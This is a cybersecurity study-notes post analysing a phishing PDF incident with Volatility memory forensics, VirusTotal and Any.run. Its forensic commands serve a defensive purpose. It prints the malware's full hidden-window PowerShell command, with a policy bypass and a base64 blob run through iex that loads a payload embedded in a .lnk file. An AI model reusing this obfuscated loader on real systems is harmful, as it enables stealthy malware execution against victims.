We covered a cyber incident response case study that involved a malicious PDF malware delivered through a phishing email. The PDF malware once opened, spawned a powershell session in a hidden window that execute a base64 encoded command to retrieve another malicious file from a C2 server. We extracted the sample using Volatility plugins then we uploaded the sample to Virustotal and Any.run to dynamically analyze the malware and extract the related artifacts.

Cyber Security Study Notes

Any.Run Free Profile

Highlights

Memory Acquisition

Extracting a memory dump can be performed in numerous ways, varying based on the requirements of your investigation. Listed below are a few of the techniques and tools that can be used to extract a memory from a bare-metal machine.

 FTK Imager
 Redline
 DumpIt.exe
 win32dd.exe / win64dd.exe
 Memoryze
 FastDump
 dd

What is Volatility

Volatility is the world’s most widely used framework for extracting digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer visibility into the runtime state of the system

Volatility 2 vs Volatility 3

Depending on the installed version of Volatility, the command syntax may differ. For example, in Volatility 2 we can directly use the plugin by using its name such as listing processes with the plugin pslist however in Volatility 3 we have to type the operating system name with the plugin with a . separating between them. Back to the process listing example, in Volatility 3 we type windows.pslist to use the plugin

Another difference is when determining the image info. In Volatility 2 we can directly use imageinfo to determine the operating system and later we use --profile osname in subsequent commands. However in Volatility 3 we use either windos.info or linux.info to determine details about the OS and we don’t need to mention or type the profile for the subsequent commands.

Commands executed in Volatility

Listing the processes

volatility -f case54.raw windows.pslist

Listing the files in the OS

volatility -f case54.raw windows.filescan

Extracting the PDF malware

volatility -f case54.raw windows.filescan | grep -i .pdf

Dumping the PDF to the local machine 

volatility -f case54.raw -o /output/ windows.dumpfiles --physaddr <offset>

The powershell command executed by the PDF malware:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JHN0UCwkc2lQPTMyMzAsOTY3NjskZj0ncmVzdW1lLnBkZi5sbmsnO2lmKC1ub3QoVGVzdC1QYXRoICRmKSl7JHg9R2V0LUNoaWxkSXRlbSAtUGF0aCAkZW52OnRlbXAgLUZpbHRlciAkZiAtUmVjdXJzZTtbSU8uRGlyZWN0b3J5XTo6U2V0Q3VycmVudERpcmVjdG9yeSgkeC5EaXJlY3RvcnlOYW1lKTt9JGxuaz1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJGYsJ09wZW4nLCdSZWFkJywnUmVhZFdyaXRlJzskYjY0PU5ldy1PYmplY3QgYnl0ZVtdKCRzaVApOyRsbmsuU2Vlaygkc3RQLFtJTy5TZWVrT3JpZ2luXTo6QmVnaW4pOyRsbmsuUmVhZCgkYjY0LDAsJHNpUCk7JGI2ND1bQ29udmVydF06OkZyb21CYXNlNjRDaGFyQXJyYXkoJGI2NCwwLCRiNjQuTGVuZ3RoKTskc2NCPVtUZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGI2NCk7aWV4ICRzY0I7')); iex $r;

Video Walkthrough | Full Analysis with Any.Run

, , , ,
Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles